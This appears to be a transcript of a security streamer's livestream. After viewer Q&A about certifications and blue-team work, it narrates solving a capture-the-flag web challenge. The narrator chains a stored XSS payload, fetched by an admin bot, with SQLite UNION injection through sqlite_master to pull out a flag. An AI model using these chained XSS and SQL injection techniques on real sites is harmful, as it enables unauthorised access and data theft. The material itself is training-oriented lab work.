and then I do like physical penetration testing and things like that. So being able to visibly recognize me would be a detriment to my job, which is why I don't do cams. What certs do I recommend as a for a sysadmin type job? Probably like depends what you're doing. If it's Windows, a lot of Microsoft certs. Like that's a good cert path. If it's networking, maybe the Cisco path. Red Hat certified engineer is also good. I would say OS, the web one, Reckitt. I'm on the blue teams, not red teams. Occasionally, I'll do like consulting for pen testing companies, but primarily, I'm on blue teams. What's the main difference between blue teams and red teams? My opinion is probably jaded, but red teams generally like going to a place, dropping a lot of bad, and then leaving. There are good red teams, don't get me wrong, but in my opinion, red teams aren't really concerned about fixing things. Yeah, I've done physical assessments. That's why I don't really do cameras. Like remotely, I could care less what people think, like what I look like, but nothing's worse than showing up to a Fortune 500 company to find someone watching Hack the Box that sees me like every day and then recognizes me off the bat. Like no matter what type of uniform I'm in, I mean, that could just be instant recognized, which is game over. So how to get started on the blue team? Pick one type of technology and learn it well, and then try to find a company that may want to implement it. Like mod security is a good one. It'll probably take you 3 to 4 weeks to learn mod security and learn it well. And then if you go to a company and say, hey, I'd like to implement like mod security and look at things and put web application firewalls up, I'm sure they may be open to that. Most of my friends kind of know I'm IPSec. Like, I played Dungeons and Dragons with a crew of IT people for probably about 2 years before they realized I had a YouTube channel. I don't really tell people in real life. Like, my girlfriend knows. Know a few people through this. Like, I know John Hammond, TJ Knoll, a bunch of those people, like, in person, so they know me. But believe it or not, I like play in like adult league, softball, kickball, dodgeball. Like, I have a life outside of computers. So, how old am I? I don't say. Can we watch the stream back? And maybe 10 to 15 minutes if I end up continuing. I'm still doing something, testing out ways we can try to get it so I can show burp suite and not expose the host name. Because if I expose the host name, then people keep putting redirects into Pornhub. So I could probably set up an Nginx reverse proxy. That's actually a good idea. I don't do full pen test tutorials. Like, yeah, I'm thinking about setting up a reverse proxy right now. I think I'm just going to create a text file and try to do it purely in Python. And then if I end up having an issue, I'll stop. So, how many Patreon subscribers do I have? I don't know offhand. I have not done the Portswigger Web Academy thing. So, I can't really give any information on that. Let's see. it's hard to know when to stop like digging deep. That's a good question. Like, I honestly just stop digging when I get bored, which generally takes a while. Like, it's hard to know when to stop. Normally, I'll dedicate a set amount of time to something, and then after I spent that much time, that's when I stop. Like, normally when I do, like, if I'm trying to learn or do Hack the Box when I was doing Hack the Box, I didn't say, hey, I'm going to pwn a box today. I said, hey, I'm going to do 2 hours of Hack the Box, and I stopped after 2 hours. So I think that's the best way to go. I really don't know the hardest box I've really done. Like, I don't keep track of those metrics. Okay, so let's see. I think I have it working. I'm going to try one last thing, and then we'll get back to doing this. I don't know good materials to learn. Like, I did a lot of this stuff probably a decade ago, so I don't really go hunt for how I'd go learn things again, if that makes sense. So let's see. Response header. See, I got one more thing I have to edit. So the issue with like the reverse proxy is all the content on the pages. Like every link on the page goes to that host name. So that's becoming an issue. Okay, that's looking good. I think we're good. Let me just clear some windows. And we can set this back up. So as a recap, what we're doing is we have a payload. Oh, I'm not sure this is going to work now. Because it'll work here, but in the actual HTML source, you'll be able to see it. Okay, well, we can work around this. So let's add a comment for one, test. Actually, in our payload, what we can do is say, let's say, where's our payload at? So we're making them make a post here, and the params are here. Okay. So the comment is going to be before this. We can do please subscribe. Actually, I don't want to use that. We'll do A, B, C, D, E, F. Or A, B, C, D. And then after this, we can do plus A, B, C, D. So what this is going to do is put A, B, C, D before and after the payload. So when we send this, actually, hold on. So this one's going to clear 1. So on 1, we're clearing it. Actually, we can probably clear 1 and 2. Probably don't have to, but for good measure, we'll clear them both at the beginning. No. We'll just manually clear 2 now. So we put our payload on 1. Let's see, clear this. Come on. So we'll put a payload on 1. And that's going to be this request. And our payload's going to have A, B, C, D, and then the base 64, and then A, B, C, D. So in this response, we can split on A, B, C, D. So instead of r.text, we'll do, let's see, output is equal to r.text.split A, B, C, D. And then if we grab the second match, we should be able to get just the base 64. Because ABCD is only going to exist twice on this page. The very first ABCD is going to be everything before the base 64. Then what's between the base ABCD is going to be the payload that we're interested in. And then ABCD is going to come again, and it's going to be the bad thing. So if we do VT, it's going to be like page stuff, ABCD, base 64, ABCD, page stuff. So if we split, all we're going to grab is this stuff. So that's what I'm doing now. That's going to do that. And if we just print output, it may be 1. I may be doing the wrong one. It could very well be that. The reason why I started at 2 is for some reason in my mind 0 is translated to everything just based upon how argv generally is handled. Like 0 in argv is all arguments, I think. And that did not work. Why did that not work? Let's see. User 2. Let's go uncomment this. And let's check user 1. And we probably got something screwed up in our JavaScript. So I'm going to press F12. We get a console, and we have a invalid character selection. So string contains an invalid character. Let's see. So let's look at the source code. On load. I don't know where that invalid character is. Style, on load, document right, A to B. Oh, we probably got a URL and we did URL safe. Okay, so what's going on here is the JavaScript on base64 function can't handle the URL safe is my guess. So let's see. Let's go back to payload. And we're not going to do URL safe anymore. But we are going to URL encode. So let's see. Payload base64 encode. Payload.decode, that's fine. So if we run this, what do we get? Looks like it's working. So let's see. Let's make the request to do that. And we get some base64. So I think we finally have it. You are not the administrator. Let's see. Port 1, get 2. Let's see. Host comment 1. Let's see. Let's add some debug messaging. So every time it does a post, let's print sending XSS payload. Now we can do asking admin to hit our payload. And then finally, we can do grabbing output. And this is clearing request. Do 2. So hopefully this one works. And what do we have? Finally have it. So now let's just get rid of the prints. And we can do, probably put this all in a function. And we'll call this def send payload. And then what do we want to make the payload? Hold on one sec. Where am I defining payload? Injection. Okay. And search. We'll put a... Ooh. What if I can do this? BF. And then do injection like that? Probably not. I'm probably going to have to close the quotes. So let's do less annoyed and just copy this to see if this will work. Set paste. Print payload. And we will do injection is equal to test. Python 3 t.py. Invalid on line 16. So if I don't have that there, that works. So right now the issue is getting the variable in here. So what I'm going to do, this, and then payload plus equals injection, and payload plus equals like that. That may work. It's not pretty, but if it works, doesn't matter. There we go. So that's going to be our solution. So we can get rid of this F and end it here. And then payload plus equals injection. And payload plus equals 3 quotes again. I probably should have used format there, but this may work. So send payload 0. We'll do 2, because we've already done 0 once. Send payload, injection. Sure. String to bytes. Let's see. Is it .encode? Let's see. You can just do like that. Let's see, line. I got 4 quotes. Maybe I need to do a space, but It's closing out the quote here on get admin send. Is why there's 4 quotes. Oh, I forgot the B here. There we go. So echo, and we should probably unbase64 this. So we can print B64 decode output, and this can be send payload input. And then this will do 0. And now we have to encode this. So let's see, test is equal to string 2 bytes, Python. I think it's just encode. Yeah, encode UTF-8. Okay, let's try this. And there we go, finally. So let's do while true. And we can do try, then accept, print, fail. So let's do 0 or 1. And then we wait a little bit. And it should print everything. So maybe we want to do a decode, so it's no longer in byte form. So send payload. Let's see. Output is equal to B64 decode. Output and output is equal to output.decode. And print output. So now when we have multiple lines, it should be able to handle them. There we go. So there are 3 users. If we go 4, it's probably going to say user ID doesn't exist or something. Yeah, just success. So we can do like % and see what happens there. Waiting for it. SQL syntax error. So what if we do like a double quote? Let's do 1 or 2. And then a comment. See what error message we get here. Just errors out with fail. There may be another table, so that's what we're going to be looking into. But getting data out of that table in SQLite is tough, I think. see what this does. Fail. Let's see. I wonder where, let's get out of this and get rid of this except so we can see why it's failing. So one single quote. And it's failing at the split. So I'd really like to open this up in Burp Suite because it's probably in our payload, but if I do, the script is going to show the domain name. Let's see. So we just got to guess at what we have to do here. Let's see. I'm going to try URL encoding. Python 3 URL encode. Yeah, the double quote's messing up the payload. That's definitely what's happening there. Put the burp suite on another screen. My Kali VM's only configured to go to one screen. So I'd have to turn like the camera off again. So we can just try this. See what this does. There we go. I'm fine with a SQLite error message. So let's try this. Let's see, unrecognized token. So let's try that. Yeah, operator Dan, right now I'm just trying to figure out what the syntax is they're doing, if they even have a quote. Like I can copy this exact one, which you did, but the issue with that is I don't think the code is using this. Like if we go back to what I was doing here, we can probably do user is equal to re/Luke unrecognized token. I don't know what quotes they were using. So that's why I was playing with this. I think if it's an integer, you don't even need to do a quote. So I'm just going to try this. I can only execute one statement at a time error. So that's why we can't do that. We're not doing nesting. So, but on the plus side, we have verified that there is no quote on the server. So let's see if SQLite has a union. So SQLite injection. Let's see. Select SQL. I guess we can try this. Not sure exactly what that's doing. So the issue with the reverse proxy right now. Oh, I guess I could go reverse proxy to burp suite to rewrite like could do that. But it's working now. Select to the left and right union do not have the same number of columns. So maybe we can only do one. So let's do this. Send, and see what happens here. One and true like this. I mean, this is just going to extract the information out of the column. Like, we've already extracted this whole thing. There's the 3 users and admin. See? We've already extracted this column, so we have to pivot to another column. So right now I'm just trying to find out how to union to extract table names. Union. So in like MySQL terms, I just go to the information schema and then be able to do it that way. But since I don't have SQL information schema, I don't know exactly how to do it in SQLite. Let's see. Oh, SQLite injection list tables. I can, to make you happy, we can do that. See what SQL is. Let's see, inject, Boolean, time-based. Union, select. Let's do 0, union, select 1. Two, three, four, five, six, 7, because people keep saying there's 7 columns for some reason. Let's try up to 6. There we go. So 1, 2, 3, 4, 5, 6. There's 6 there. So if we do union select, SQL 2, 3, 4, 5, 6. I think Bloodhound was missing the select on this. No such column SQL. Yeah. So that's what I was trying to do now, is find a way to identify the columns in this table. Maybe we can do guess at flag. A good shot in the dark. No such column flag. user. So the issue why I don't think I can do this is I'm injecting here. I'm not injecting into the from. So I don't have access to the SQLite master right now. We may able to do table name dot SQLite master. From SQLite master like that. See if this works. No such column name, table name. TBL underscore name. So let's try this. Let's see. Comment, flag, user, result. Okay. So we're in comment. So we definitely want flag. So now we're finally getting close. So flag. I guessed at that though. No such column flag. So what is this? So that's table. Oh, we got to get columns. So flag is a table. So flag probably has a column. So let's try select column name 2, 3, 4, 5, 6 from SQLite master. And actually, I want to do TBL name, COL name 3, 4, 5, 6 from SQLite master. There we go. No such column. So let's look at SQLite master and see what columns are. Or maybe it's already on payload all the things. Extract column name. Or type. Oh my god. Select SQL from SQLite master where Jesus. Okay. 0 union select 1, 2, 3, 4, 5. All this stuff. Let's see. 0 union select SQL 2, 3, 4, 5, 6. I don't know why that. Oh. I probably have to do table name. So this is probably flag. There we go. So create table flag. The column is flag. So we probably could have guessed that one. So we can do 0 union select flag 2, 3, 4, 5, 6 from SQLite master where from flag. So I messed up somewhere. Flag 2, 3, 4, 5, 6 from flag. Silly mistake, but this should get it. And finally, have got the flag after way too long in this challenge. But I'm burned out and I don't want to do the next one because of what people are doing in this challenge. So take care, guys. I will see you all probably sometime next week. Later.